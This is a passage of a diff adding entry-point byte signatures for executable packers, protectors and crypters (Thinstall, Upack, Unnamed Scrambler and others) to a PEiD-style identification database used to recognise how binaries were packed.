+signature = B8 EF BE AD DE 50 6A 00 FF 15 ?? ?? ?? ?? E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00
+ep_only = true
+
+[Thinstall Embedded 2.2X-2.308 -> Jitit]
+signature = B8 EF BE AD DE 50 6A 00 FF 15 ?? ?? ?? ?? E9 B9 FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00
+ep_only = true
+
+[Thinstall Embedded 2.312 -> Jitit]
+signature = 6A 00 FF 15 ?? ?? ?? ?? E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00
+ep_only = true
+
+[Thinstall Embedded 2.422-2.428 -> Jitit]
+signature = 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D 9B 1A 00 00 B9 84 1A 00 00 BA 14 1B 00 00 BE 00 10 00 00 BF B0 53 00 00 BD E0 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10
+ep_only = true
+
+[Thinstall Embedded 2.501 -> Jitit]
+signature = 55 8B EC B8 ?? ?? ?? ?? BB ?? ?? ?? ?? 50 E8 00 00 00 00 58 2D A8 1A 00 00 B9 6D 1A 00 00 BA 21 1B 00 00 BE 00 10 00 00 BF C0 53 00 00 BD F0 1A 00 00 03 E8 81 75 00 ?? ?? ?? ?? 81 75 04 ?? ?? ?? ?? 81 75 08 ?? ?? ?? ?? 81 75 0C ?? ?? ?? ?? 81 75 10
+ep_only = true
+
+[Thinstall Embedded 2.545 -> Jitit]
+signature = E8 F2 FF FF FF 50 68 ?? ?? ?? ?? 68 40 1B 00 00 E8 42 FF FF FF E9 9D FF FF FF 00 00 00 00 00 00
+ep_only = true
+
+[Thinstall Embedded 2.547-V2.600 -> Jitit]
+signature = E8 00 00 00 00 58 BB BC 18 00 00 2B C3 50 68 ?? ?? ?? ?? 68 60 1B 00 00 68 60 00 00 00 E8 35 FF FF FF E9 99 FF FF FF 00 00
+ep_only = true
+
+[Thinstall Embedded 2.609 -> Jitit]
+signature = E8 00 00 00 00 58 BB AD 19 00 00 2B C3 50 68 ?? ?? ?? ?? 68 B0 1C 00 00 68 80 00 00 00 E8 35 FF FF FF E9 99 FF FF FF 00
+ep_only = true
+
+[Thinstall Embedded 2.620-2.623 -> Jitit]
+signature = E8 00 00 00 00 58 BB AC 1E 00 00 2B C3 50 68 ?? ?? ?? ?? 68 B0 21 00 00 68 C4 00 00 00 E8 C3 FE FF FF E9 99 FF FF FF 00 00
+ep_only = true
+
+[Thinstall Embedded 2.717-2.719 -> Jitit]
+signature = 9C 60 E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 C1 FE FF FF E9 97 FF FF FF CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB A2 B9 01 00 00 00 E8 D0 00 00 00 83 C0 07 89 45 F8 C6 45 F7 00 83 F8 08 74 89 E8 B1 00 00 00 88 45 F7 E9 7C FF FF FF B9 07 00 00 00 E8 AA 00 00 00 50 33 C9 B1 02 E8 A0 00 00 00 8B C8 41 41 58 0B C0 74 04 8B D8 EB 5E 83 F9 02 74 6A 41 E8 88 00 00 00 89 45 FC E9 48 FF FF FF E8 87 00 00 00 49 E2 09 8B C3 E8 7D 00 00 00 EB 3A 49 8B C1 55 8B 4D FC 8B E8 33 C0 D3 E5 E8 5D 00 00 00 0B C5 5D 8B D8 E8 5F 00 00 00 3D 00 00 01 00 73 14 3D FF 37 00 00 73 0E 3D 7F 02 00 00 73 08 83 F8 7F 77 04 41 41 41 41 56 8B F7 2B F0 F3 A4 5E E9 F0 FE FF FF 33 C0 EB 05 8B C7 2B 45 0C 5E 5F 5B C9 C2 08 00
+ep_only = true
+
+[Thinstall V2.403 -> Jitit]
+signature = 6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41
+ep_only = true
+
+[Thinstall V2.403 -> Jitit]
+signature = 6A 00 FF 15 20 50 40 00 E8 D4 F8 FF FF E9 E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 57 BF 00 00 80 00 39 79 14 77 36 53 56 8B B1 29 04 00 00 8B 41 0C 8B 59 10 03 DB 8A 14 30 83 E2 01 0B D3 C1 E2 07 40 89 51 10 89 41 0C 0F B6 04 30 C1 61 14 08 D1 E8 09 41 10 39
+ep_only = true
+
+[Thinstall v2.460 -> Jitit]
+signature = 55 8B EC 51 53 56 57 6A 00 6A 00 FF 15 F4 18 40 00 50 E8 87 FC FF FF 59 59 A1 94 1A 40 00 8B 40 10 03 05 90 1A 40 00 89 45 FC 8B 45 FC FF E0 5F 5E 5B C9 C3 00 00 00 76 0C 00 00 D4 0C 00 00 1E
+ep_only = true
+
+[Thinstall V2.7X -> Jitit]
+signature = 9C 60 E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? E9
+ep_only = true
+
+[Thinstall Virtualization Suite 3.035-3.043 -> Thinstall Company]
+signature = 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 28 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB
+ep_only = true
+
+[Thinstall Virtualization Suite 3.049-3.080 -> Thinstall Company]
+signature = 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 2C 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00
+ep_only = true
+
+[Thinstall Virtualization Suite 3.049-3.080 -> Thinstall Company]
+signature = 9C 60 68 53 74 41 6C 68 54 68 49 6E E8 00 00 00 00 58 BB 37 1F 00 00 2B C3 50 68 ?? ?? ?? ?? 68 00 2C 00 00 68 04 01 00 00 E8 BA FE FF FF E9 90 FF FF FF CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA 00 00 00 80 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 C6 00 00 00 E8 DF 00 00 00 73 1B 55 BD 00 01 00 00 E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB
+ep_only = true
+
+[Thinstall Virtualization Suite 3.0X -> Thinstall Company]
+signature = 9C 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 BA FE FF FF E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA
+ep_only = true
+
+[Thinstall Virtualization Suite 3.0X -> Thinstall Company]
+signature = 9C 60 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 00 00 00 00 58 BB ?? ?? ?? ?? 2B C3 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 BA FE FF FF E9 ?? ?? ?? ?? CC CC CC CC CC CC CC 55 8B EC 83 C4 F4 FC 53 57 56 8B 75 08 8B 7D 0C C7 45 FC 08 00 00 00 33 DB BA ?? ?? ?? ?? 43 33 C0 E8 19 01 00 00 73 0E 8B 4D F8 E8 27 01 00 00 02 45 F7 AA EB E9 E8 04 01 00 00 0F 82 96 00 00 00 E8 F9 00 00 00 73 5B B9 04 00 00 00 E8 05 01 00 00 48 74 DE 0F 89 ?? ?? ?? ?? E8 DF 00 00 00 73 1B 55 BD ?? ?? ?? ?? E8 DF 00 00 00 88 07 47 4D 75 F5 E8 C7 00 00 00 72 E9 5D EB
+ep_only = true
+
+[Thinstall vx.x]
+signature = B8 EF BE AD DE 50 6A ?? FF 15 10 19 40 ?? E9 AD FF FF FF
+ep_only = true
+
+[TMT-Pascal v0.40]
+signature = 0E 1F 06 8C 06 ?? ?? 26 A1 ?? ?? A3 ?? ?? 8E C0 66 33 FF 66 33 C9
+ep_only = true
+
+[TopSpeed v3.01 1989]
+signature = 1E BA ?? ?? 8E DA 8B ?? ?? ?? 8B ?? ?? ?? FF ?? ?? ?? 50 53
+ep_only = true
+
+[TPPpack -> clane]
+signature = E8 00 00 00 00 5D 81 ED F5 8F 40 00 60 33 ?? E8
+ep_only = true
+
+[Trainer Creation Kit v5 Trainer]
+signature = 6A 00 68 80 00 00 00 6A 02 6A 00 6A 00 68 00 00 00 40 68 25 45 40 00 E8 3C 02 00 00 50 6A 00 68 40 45 40 00 68 00 10 00 00 68 00 30 40 00 50 E8 54 02 00 00 58 50 E8 17 02 00 00 6A 00 E8 2E 02 00 00 A3 70 45 40 00 68 25 45 40 00 E8 2B 02 00 00 A3 30 45 40
+ep_only = false
+
+[Trivial173 by SMT/SMF]
+signature = EB ?? ?? 28 54 72 69 76 69 61 6C 31 37 33 20 62 79 20 53 4D 54 2F 53 4D 46 29
+ep_only = true
+
+[UG2002 Cruncher v0.3b3]
+signature = 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58
+ep_only = true
+
+[UltraPro V1.0 -> SafeNet]
+signature = A1 ?? ?? ?? ?? 85 C0 0F 85 3B 06 00 00 55 56 C7 05 ?? ?? ?? ?? 01 00 00 00 FF 15
+ep_only = true
+
+[UnderGround Crypter - by Booster2000]
+signature = 55 8B EC 83 C4 F0 B8 74 3C 00 11 E8 94 F9 FF FF E8 BF FE FF FF E8 0A F3 FF FF 8B C0
+ep_only = false
+
+[Unknown by SMT]
+signature = 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 ?? ?? 57 EB
+ep_only = true
+
+[Unknown Joiner (sign from pinch 26.03.2007 02:12)]
+signature = 44 90 4C 90 B9 DE 00 00 00 BA 00 10 40 00 83 C2 03 44 90 4C B9 07 00 00 00 44 90 4C 33 C9 C7 05 08 30 40 00 00 00 00 00 90 68 00 01 00 00 68 21 30 40 00 6A 00 E8 C5 02 00 00 90 6A 00 68 80
+ep_only = true
+
+[Unnamed Scrambler 1.0 -> p0ke]
+signature = 55 8B EC 83 C4 EC 53 56 33 C0 89 45 ?? ?? ?? ?? 40 00 E8 11 F4 FF FF BE 30 6B 40 00 33 C0 55 68 C9 42 40 00 64 FF 30 64 89 20 E8 C9 FA FF FF BA D8 42 40 00 8B ?? ?? ?? ?? FF FF 8B D8 B8 28 6B 40 00 8B 16 E8 37 F0 FF FF B8 2C 6B 40 00 8B 16 E8 2B F0 FF FF B8 28 6B 40 00 E8 19 F0 FF FF 8B D0 8B C3 8B 0E E8 42 E3 FF FF BA DC 42 40 00 8B C6 E8 2A FA FF FF 8B D8 B8 20 6B 40 00 8B 16 E8 FC EF FF FF B8 24 6B 40 00 8B 16 E8 F0 EF FF FF B8 20 6B 40 00 E8 DE EF FF FF 8B D0 8B C3 8B 0E E8 07 E3 FF FF 6A 00 6A 19 6A 00 6A 32 A1 28 6B 40 00 E8 59 EF FF FF 83 E8 05 03 C0 8D 55 EC E8 94 FE FF FF 8B 55 EC B9 24 6B 40 00 A1 20 6B 40 00 E8 E2 F6 FF FF 6A 00 6A 19 6A 00 6A 32
+ep_only = false
+
+[Unnamed Scrambler 1.1C -> p0ke]
+signature = 55 8B EC 83 C4 E4 53 56 33 C0 89 45 E4 89 45 E8 89 45 EC B8 C0 47 00 10 E8 4F F3 FF FF BE 5C 67 00 10 33 C0 55 68 D2 4A 00 10 64 FF 30 64 89 20 E8 EB DE FF FF E8 C6 F8 FF FF BA E0 4A 00 10 B8 CC 67 00 10 E8 5F F8 FF FF 8B D8 8B D6 8B C3 8B 0D CC 67 00 10 E8 3A DD FF FF 8B 46 50 8B D0 B8 D4 67 00 10 E8 5B EF FF FF B8 D4 67 00 10 E8 09 EF FF FF 8B D0 8D 46 14 8B 4E 50 E8 14 DD FF FF 8B 46 48 8B D0 B8 D8 67 00 ?? ?? ?? ?? ?? FF B8 D8 67 00 10 E8 E3 EE FF FF 8B D0 8B C6 8B 4E 48 E8 EF DC FF FF FF 76 5C FF 76 58 FF 76 64 FF 76 60 B9 D4 67 00 10 8B 15 D8 67 00 10 A1 D4 67 00 10 E8 76 F6 FF FF A1 D4 67 00 10 E8 5C EE FF FF 8B D0 B8 CC 67 00 10 E8 CC F7 FF FF 8B D8 B8 DC 67 00 10
+ep_only = false
+
+[Unnamed Scrambler 1.2B -> p0ke]
+signature = 55 8B EC 83 C4 D8 53 56 57 33 C0 89 45 D8 89 45 DC 89 45 E0 89 45 E4 89 45 E8 B8 70 3A 40 00 E8 C4 EC FF FF 33 C0 55 68 5C 3F 40 00 64 FF 30 64 89 20 E8 C5 D7 FF FF E8 5C F5 FF FF B8 20 65 40 00 33 C9 BA 04 01 00 00 E8 D3 DB FF FF 68 04 01 00 00 68 20 65 40 00 6A 00 FF 15 10 55 40 00 BA 6C 3F 40 00 B8 14 55 40 00 E8 5A F4 FF FF 85 C0 0F 84 1B 04 00 00 BA 18 55 40 00 8B 0D 14 55 40 00 E8 16 D7 FF FF 8B 05 88 61 40 00 8B D0 B8 54 62 40 00 E8 D4 E3 FF FF B8 54 62 40 00 E8 F2 E2 FF FF 8B D0 B8 18 55 40 00 8B 0D 88 61 40 00 E8 E8 D6 FF FF FF 35 34 62 40 00 FF 35 30 62 40 00 FF 35 3C 62 40 00 FF 35 38 62 40 00 8D 55 E8 A1 88 61 40 00 E8 E3 F0 FF FF 8B 55 E8
+ep_only = false
+
+[Unnamed Scrambler 1.2C / 1.2D -> p0ke]
+signature = 55 8B EC B9 05 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 ?? 3A ?? ?? E8 ?? EC FF FF 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? D7 FF FF E8 ?? ?? FF FF B8 20 ?? ?? ?? 33 C9 BA 04 01 00 00 E8 ?? DB FF FF 68 04 01 00 00 68 20 ?? ?? ?? 6A 00 FF 15 10 ?? ?? ?? BA ?? ?? ?? ?? B8 14 ?? ?? ?? E8 ?? ?? FF FF 85 C0 0F 84 ?? 04 00 00 BA 18 ?? ?? ?? 8B 0D 14 ?? ?? ?? E8 ?? ?? FF FF 8B 05 88 ?? ?? ?? 8B D0 B8 54 ?? ?? ?? E8 ?? E3 FF FF B8 54 ?? ?? ?? E8 ?? E2 FF FF 8B D0 B8 18 ?? ?? ?? 8B 0D 88 ?? ?? ?? E8 ?? D6 FF FF FF 35 34 ?? ?? ?? FF 35 30 ?? ?? ?? FF 35 3C ?? ?? ?? FF 35 38 ?? ?? ?? 8D 55 E8 A1 88 ?? ?? ?? E8 ?? F0 FF FF 8B 55 E8 B9 54
+ep_only = false
+
+[Unnamed Scrambler 1.3B -> p0ke]
+signature = 55 8B EC B9 08 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 98 56 00 10 E8 48 EB FF FF 33 C0 55 68 AC 5D 00 10 64 FF 30 64 89 20 6A 00 68 BC 5D 00 10 68 C4 5D 00 10 6A 00 E8 23 EC FF FF E8 C6 CE FF FF 6A 00 68 BC 5D 00 10 68 ?? ?? ?? ?? 6A 00 E8 0B EC FF FF E8 F2 F4 FF FF B8 08 BC 00 10 33 C9 BA 04 01 00 00 E8 C1 D2 FF FF 6A 00 68 BC 5D 00 10 68 E4 5D 00 10 6A 00 E8 E2 EB FF FF 68 04 01 00 00 68 08 BC 00 10 6A 00 FF 15 68 77 00 10 6A 00 68 BC 5D 00 10 68 FC 5D 00 10 6A 00 E8 BD EB FF FF BA 10 5E 00 10 B8 70 77 00 10 E8 CA F3 FF FF 85 C0 0F 84 F7 05 00 00 BA 74 77 00 10 8B 0D 70 77 00 10 E8 FE CD FF FF 6A 00
+ep_only = true
+
+[Unnamed Scrambler 2.0 -> p0ke]
+signature = 55 8B EC B9 0A 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 1C 2F 40 00 E8 C8 F1 FF FF 33 C0 55 68 FB 33 40 00 64 FF 30 64 89 20 BA 0C 34 40 00 B8 E4 54 40 00 E8 EF FE FF FF 8B D8 85 DB 75 07 6A 00 E8 5A F2 FF FF BA E8 54 40 00 8B C3 8B 0D E4 54 40 00 E8 74 E2 FF FF C7 05 20 6B 40 00 09 00 00 00 BB 98 69 40 00 C7 45 EC E8 54 40 00 C7 45 E8 31 57 40 00 C7 45 E4 43 60 40 00 BE D3 6A 40 00 BF E0 6A 40 00 83 7B 04 00 75 0B 83 3B 00 0F 86 AA 03 00 00 EB 06 0F 8E A2 03 00 00 8B 03 8B D0 B8 0C 6B 40 00 E8 C1 EE FF FF B8 0C 6B 40 00 E8 6F EE FF FF 8B D0 8B 45 EC 8B 0B E8 0B E2 FF FF 6A 00 6A 1E 6A 00 6A 2C A1 0C 6B 40 00 E8 25 ED FF FF 8D 55 E0 E8 15 FE FF FF 8B 55 E0 B9 10 6B 40 00 A1 0C 6B 40 00
+ep_only = false
+
+[Unnamed Scrambler 2.1(Beta) / 2.1.1 -> p0ke]
+signature = 55 8B EC B9 15 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 ?? 3A ?? ?? E8 ?? EE FF FF 33 C0 55 68 ?? 43 ?? ?? 64 FF 30 64 89 20 BA ?? 43 ?? ?? B8 E4 64 ?? ?? E8 0F FD FF FF 8B D8 85 DB 75 07 6A 00 E8 ?? EE FF FF BA E8 64 ?? ?? 8B C3 8B 0D E4 64 ?? ?? E8 ?? D7 FF FF B8 F8 ?? ?? ?? BA 04 00 00 00 E8 ?? EF FF FF 33 C0 A3 F8 ?? ?? ?? BB ?? ?? ?? ?? C7 45 EC E8 64 ?? ?? C7 45 E8 ?? ?? ?? ?? C7 45 E4 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? B8 E0 ?? ?? ?? BA 04 00 00 00 E8 ?? EF FF FF 68 F4 01 00 00 E8 ?? EE FF FF 83 7B 04 00 75 0B 83 3B 00 0F 86 ?? 07 00 00 EB 06 0F 8E ?? 07 00 00 8B 03 8B D0 B8 E4 ?? ?? ?? E8 ?? E5 FF FF B8 E4 ?? ?? ?? E8 ?? E3 FF FF 8B D0 8B 45 EC 8B 0B E8
+ep_only = false
+
+[Unnamed Scrambler 2.5.1(Beta 2) / 2.5.2 -> p0ke]
+signature = 55 8B EC B9 ?? 00 00 00 6A 00 6A 00 49 75 F9 53 56 57 B8 ?? ?? 40 00 E8 ?? EA FF FF 33 C0 55 68 ?? ?? 40 00 64 FF 30 64 89 20 BA ?? ?? 40 00 B8 ?? ?? 40 00 E8 63 F3 FF FF 8B D8 85 DB 75 07 6A 00 E8 ?? ?? FF FF BA ?? ?? 40 00 8B C3 8B 0D ?? ?? 40 00 E8 ?? ?? FF FF C7 05 ?? ?? 40 00 0A 00 00 00 BB ?? ?? 40 00 BE ?? ?? 40 00 BF ?? ?? 40 00 B8 ?? ?? 40 00 BA 04 00 00 00 E8 ?? EB FF FF 83 3B 00 74 04 33 C0 89 03 8B D7 8B C6 E8 0A F3 FF FF 89 03 83 3B 00 0F 84 F7 04 00 00 B8 ?? ?? 40 00 8B 16 E8 ?? E1 FF FF B8 ?? ?? 40 00 E8 ?? E0 FF FF 8B D0 8B 03 8B 0E E8 ?? ?? FF FF 8B C7 A3 ?? ?? 40 00 8D 55 EC 33 C0 E8 ?? D3 FF FF 8B 45 EC B9 ?? ?? 40 00 BA ?? ?? 40 00 E8 8B ED FF FF 3C 01 75 2B A1
+ep_only = false
+
+[Unnamed Scrambler 2.5A -> p0ke]
+signature = 55 8B EC B9 0B 00 00 00 6A 00 6A 00 49 75 F9 51 53 56 57 B8 6C 3E 40 00 E8 F7 EA FF FF 33 C0 55 68 60 44 40 00 64 FF 30 64 89 20 BA 70 44 40 00 B8 B8 6C 40 00 E8 62 F3 FF FF 8B D8 85 DB 75 07 6A 00 E8 A1 EB FF FF BA E8 64 40 00 8B C3 8B 0D B8 6C 40 00 E8 37 D3 FF FF C7 05 BC 6C 40 00 0A 00 00 00 BB 68 6C 40 00 BE 90 6C 40 00 BF E8 64 40 00 B8 C0 6C 40 00 BA 04 00 00 00 E8 07 EC FF FF 83 3B 00 74 04 33 C0 89 03 8B D7 8B C6 E8 09 F3 FF FF 89 03 83 3B 00 0F 84 BB 04 00 00 B8 C0 6C 40 00 8B 16 E8 06 E2 FF FF B8 C0 6C 40 00 E8 24 E1 FF FF 8B D0 8B 03 8B 0E E8 D1 D2 FF FF 8B C7 A3 20 6E 40 00 8D 55 EC 33 C0 E8 0C D4 FF FF 8B 45 EC B9 1C 6E 40 00 BA 18 6E 40 00
+ep_only = false
+
+[UnoPiX 0.75 -> BaGiE]
+signature = 60 E8 07 00 00 00 61 68 ?? ?? 40 00 C3 83 04 24 18 C3 20 83 B8 ED 20 37 EF C6 B9 79 37 9E 61
+ep_only = true
+
+[UnoPiX 1.03-1.10 -> BaGiE]
+signature = 83 EC 04 C7 04 24 00 ?? ?? ?? C3 00 ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? 00 10 00 00 00 02 00 00 01 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 ?? ?? 00 00 10 00 00 00 00 00 00 02 00 00 ?? 00 00 ?? 00 00 ?? ?? 00 00 00 10 00 00 10 00 00 00 00 00 00 10
+ep_only = true
+
+[Unpacked BS-SFX Archive v1.9]
+signature = 1E 33 C0 50 B8 ?? ?? 8E D8 FA 8E D0 BC ?? ?? FB B8 ?? ?? CD 21 3C 03 73
+ep_only = true
+
+[Upack 0.10 - 0.12 beta -> Dwing]
+signature = BE 48 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 AD 87 F5 58 8D 54 86 5C FF D5 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1
+ep_only = true
+
+[Upack 0.12 beta-->Dwing]
+signature = BE 48 01 40 00 AD ?? ?? ?? A5 ?? C0 33 C9 ?? ?? ?? ?? ?? ?? ?? F3 AB ?? ?? 0A ?? ?? ?? ?? AD 50 97 51 ?? 87 F5 58 8D 54 86 5C ?? D5 72 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? B6 5F FF C1
+ep_only = true
+
+[Upack 0.20 beta -> Dwing]
+signature = BE 88 01 40 00 AD 8B F8 95 A5 33 C0 33 C9 AB 48 AB F7 D8 B1 04 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3
+ep_only = true
+
+[Upack 0.21 beta -> Dwing]
+signature = BE 88 01 40 00 AD 8B F8 6A 04 95 A5 33 C0 AB 48 AB F7 D8 59 F3 AB C1 E0 0A B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 5A 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00
+ep_only = true
+
+[Upack 0.22 - 0.23 beta -> Dwing]
+signature = 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54
+ep_only = false
+
+[Upack 0.22 - 0.23 beta -> Dwing]
+signature = 6A 07 BE 88 01 40 00 AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 59 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00
+ep_only = true
+
+[Upack 0.22 - 0.23 beta -> Dwing]
+signature = ?? ?? ?? ?? ?? ?? ?? AD 8B F8 59 95 F3 A5 AD B5 ?? F3 AB AD 50 97 51 58 8D 54 85 5C FF 16 72 ?? 2C 03 73 02 B0 00 3C 07 72 02 2C 03 50 0F B6 5F FF C1 E3 ?? B3 00 8D 1C 5B 8D 9C 9D 0C 10 00 00
+ep_only = true
+
+[Upack 0.24 - 0.27 beta / 0.28 alpha -> Dwing]
